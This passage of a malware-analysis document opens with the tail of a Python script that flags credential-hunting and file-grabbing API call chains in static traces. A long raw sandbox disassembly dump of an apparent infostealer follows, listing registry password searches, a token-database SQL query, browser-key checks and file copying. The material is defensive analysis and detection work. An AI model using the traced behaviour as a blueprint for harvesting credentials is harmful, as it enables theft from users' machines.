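        "hKey": HKEY_ROOTS.get(int(root, 16), root) if root != "?" else root,
        "samDesired": KEY_RIGHTS.get(int(sam, 16), sam) if sam != "?" else sam,
    }


def in_order(names: List[str], wanted: List[str]) -> bool:
    """True if every API in `wanted` appears in `names`, in that relative order."""
    pos = 0
    for w in wanted:
        if w not in names[pos:]:
            return False
        pos = names.index(w, pos) + 1
    return True


def flag_behaviours(calls: List[ApiCall]) -> List[Dict[str, str]]:
    """Group calls by function and flag credential hunting and file grabbing (heuristic labels)."""
    by_func: Dict[Optional[int], List[ApiCall]] = {}
    for c in calls:
        by_func.setdefault(c.subcall, []).append(c)
    findings = []
    for func, seq in by_func.items():
        names = [c.api for c in seq]
        where = f"{func:08X}" if func is not None else "top-level"
        # String literals passed to StrStrA: anything that is not '?' and not an 8-digit hex address.
        lits = [a for c in seq if c.api == "StrStrA" for a in c.args if a != "?" and not HEX8.fullmatch(a)]
        if in_order(names, ["RegOpenKeyExA", "RegEnumValueA", "StrStrA"]) and any("password" in s.lower() for s in lits):
            findings.append({"behaviour": "registry-password-hunt", "function": where,
                             "evidence": "RegEnumValueA -> StrStrA(" + ",".join(lits) + ")"})
        if in_order(names, ["FindFirstFileA", "PathMatchSpecA", "CopyFileA"]):
            cleanup = " then DeleteFileA" if "DeleteFileA" in names else ""
            findings.append({"behaviour": "file-grabber", "function": where,
                             "evidence": "FindFirstFileA -> PathMatchSpecA -> CopyFileA" + cleanup})
    return findings


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_TRACE)
    for c in parsed:
        if c.api == "RegOpenKeyExA":
            print(f"{c.ref:08X} RegOpenKeyExA {decode_reg_open(c)}")
    for f in flag_behaviours(parsed):
        print(f)
```

The order check is deliberate: RegOpenKeyExA followed by RegEnumValueA and a StrStrA on a credential keyword is a tight enough chain to be worth a triage flag, whereas the individual calls are benign on their own. Static traces such as these carry unresolved arguments ("?"), so the decoder passes them through rather than guessing.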
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                  • API String ID: 1440504306-1079375795
                                                                                  • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                                                                  • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                                                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess$DefaultLangUser
                                                                                  • String ID: B
                                                                                  • API String ID: 1494266314-2248957098
                                                                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                                                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                                                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                                                                  APIs
                                                                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                                                  • memset.MSVCRT ref: 00409EE8
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                                                  • API String ID: 1977917189-1096346117
                                                                                  • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                                                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
• Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
• Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
APIs
  • Part of subcall function 00B07537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B075A1
  • Part of subcall function 00B07537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B07618
  • Part of subcall function 00B07537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B07674
  • Part of subcall function 00B07537: GetProcessHeap.KERNEL32(00000000,?), ref: 00B076B9
  • Part of subcall function 00B07537: HeapFree.KERNEL32(00000000), ref: 00B076C0
• lstrcat.KERNEL32(0064A668,004217FC), ref: 00B0786D
• lstrcat.KERNEL32(0064A668,00000000), ref: 00B078AF
• lstrcat.KERNEL32(0064A668,00421800), ref: 00B078C1
• lstrcat.KERNEL32(0064A668,00000000), ref: 00B078F6
• lstrcat.KERNEL32(0064A668,00421804), ref: 00B07907
• lstrcat.KERNEL32(0064A668,00000000), ref: 00B0793A
• lstrcat.KERNEL32(0064A668,00421808), ref: 00B07954
• task.LIBCPMTD ref: 00B07962
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
• String ID:
• API String ID: 2677904052-0
• Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
• Instruction ID: f5a4e5c11c7603e1b7a238424a837f1e778a86e0ab68cc837ba4d4f41564fa5e
• Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
• Instruction Fuzzy Hash: 7F313C75E40109EFCB04FBE0DC95DFE7BBAEB55301B105198F106A7290DA34EA42CB61
APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
• HeapAlloc.KERNEL32(00000000), ref: 00404FD1
• InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
• InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
• memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
• InternetCloseHandle.WININET(00415EDB), ref: 004050B9
• InternetCloseHandle.WININET(?), ref: 004050C6
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
• String ID:
• API String ID: 3894370878-0
• Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
• Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
• Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
• Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B05231
• RtlAllocateHeap.NTDLL(00000000), ref: 00B05238
• InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00B05251
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B05278
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B052A8
• memcpy.MSVCRT(00000000,?,00000001), ref: 00B052F1
• InternetCloseHandle.WININET(?), ref: 00B05320
• InternetCloseHandle.WININET(?), ref: 00B0532D
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
• String ID:
• API String ID: 1008454911-0
• Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
• Instruction ID: e6c8bca099c0b23a82f0bbf5057999c90a48133089bcfaaca672917ace4d2b92
• Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
• Instruction Fuzzy Hash: AB3118B8A40218ABDB20CF94DC85BDDBBB5EB48704F5081D9F609A7281D7706EC58F99
APIs
• memset.MSVCRT ref: 00B0158E
  • Part of subcall function 00B01507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B0151B
  • Part of subcall function 00B01507: RtlAllocateHeap.NTDLL(00000000), ref: 00B01522
  • Part of subcall function 00B01507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B0153E
  • Part of subcall function 00B01507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B0155C
  • Part of subcall function 00B01507: RegCloseKey.ADVAPI32(?), ref: 00B01566
• lstrcat.KERNEL32(?,00000000), ref: 00B015B6
• lstrlen.KERNEL32(?), ref: 00B015C3
• lstrcat.KERNEL32(?,004262EC), ref: 00B015DE
  • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
  • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
  • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
  • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
  • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
  • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
  • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
  • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B016CC
  • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
  • Part of subcall function 00B09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
  • Part of subcall function 00B09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
  • Part of subcall function 00B09C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
  • Part of subcall function 00B09C27: ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
  • Part of subcall function 00B09C27: LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
  • Part of subcall function 00B09C27: CloseHandle.KERNEL32(000000FF), ref: 00B09D01
• DeleteFileA.KERNEL32(00000000), ref: 00B01756
• memset.MSVCRT ref: 00B0177D
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
• String ID:
• API String ID: 3885987321-0
• Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
• Instruction ID: 26c9f245f0b0e1ca5061658026ef5d92ea4eb1895ccdb2e2f51c81504de9cb73
• Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
• Instruction Fuzzy Hash: 585145B19502189BCB19FB60DD92EED77BCAF54700F8045E8B60A62081EE706BC5CF56
APIs
• GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,009045D8,?,0042110C,?,00000000,?), ref: 0041696C
• sscanf.NTDLL ref: 00416999
• SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,009045D8,?,0042110C), ref: 004169B2
• SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,009045D8,?,0042110C), ref: 004169C0
• ExitProcess.KERNEL32 ref: 004169DA
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: Time$System$File$ExitProcesssscanf
• String ID: B
• API String ID: 2533653975-2248957098
• Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
• Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
• Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
• Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
APIs
• RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
• wsprintfA.USER32 ref: 00418459
• RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
• RegCloseKey.ADVAPI32(00000000), ref: 0041848C
• RegCloseKey.ADVAPI32(00000000), ref: 00418499
  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
• RegQueryValueExA.ADVAPI32(00000000,0090A058,00000000,000F003F,?,00000400), ref: 004184EC
• lstrlenA.KERNEL32(?), ref: 00418501
• RegQueryValueExA.ADVAPI32(00000000,00909F08,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
• RegCloseKey.ADVAPI32(00000000), ref: 00418608
• RegCloseKey.ADVAPI32(00000000), ref: 0041861A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
• String ID: %s\%s
• API String ID: 3896182533-4073750446
• Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
• Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
• Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
• Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
APIs
• ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
• ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
• ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
• lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
• InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: ??2@$CrackInternetlstrlen
• String ID: <
• API String ID: 1683549937-4251816714
• Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
• Instruction ID: b4e381528f016d85e2c8742ade995a2d7b576c553e8c9fd07d13d7e06a20f539
• Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
• Instruction Fuzzy Hash: DD213BB5D00219ABDF14EFA4E849AED7BB4FF44321F108265F925A72D0EB706A05CF91
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
• HeapAlloc.KERNEL32(00000000), ref: 004176AB
• RegOpenKeyExA.ADVAPI32(80000002,009026D8,00000000,00020119,00000000), ref: 004176DD
• RegQueryValueExA.ADVAPI32(00000000,0090A040,00000000,00000000,?,000000FF), ref: 004176FE
• RegCloseKey.ADVAPI32(00000000), ref: 00417708
Strings
Memory Dump Source
• Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: Windows 11
• API String ID: 3466090806-2517555085
• Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
• Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
• Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
• Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B1790B
• RtlAllocateHeap.NTDLL(00000000), ref: 00B17912
• RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00B17944
• RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00B17965
• RegCloseKey.ADVAPI32(00000000), ref: 00B1796F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• String ID: Windows 11
• API String ID: 3225020163-2517555085
• Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
• Instruction ID: eab6bdbde0d19adba7e73b4b67b994201a0db00f9da023f5037083124a64f737
• Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
• Instruction Fuzzy Hash: FD012CB9A84204BBEB00DBE0DD49FADB7B9EB48701F505194BA0597281DA7499448B51
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,009026D8,00000000,00020119,004176B9), ref: 0041775B
                                                                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                  • String ID: CurrentBuildNumber
                                                                                  • API String ID: 3466090806-1022791448
                                                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: :A$:A
                                                                                  • API String ID: 1378416451-1974578005
                                                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B075A1
                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B07618
                                                                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B07674
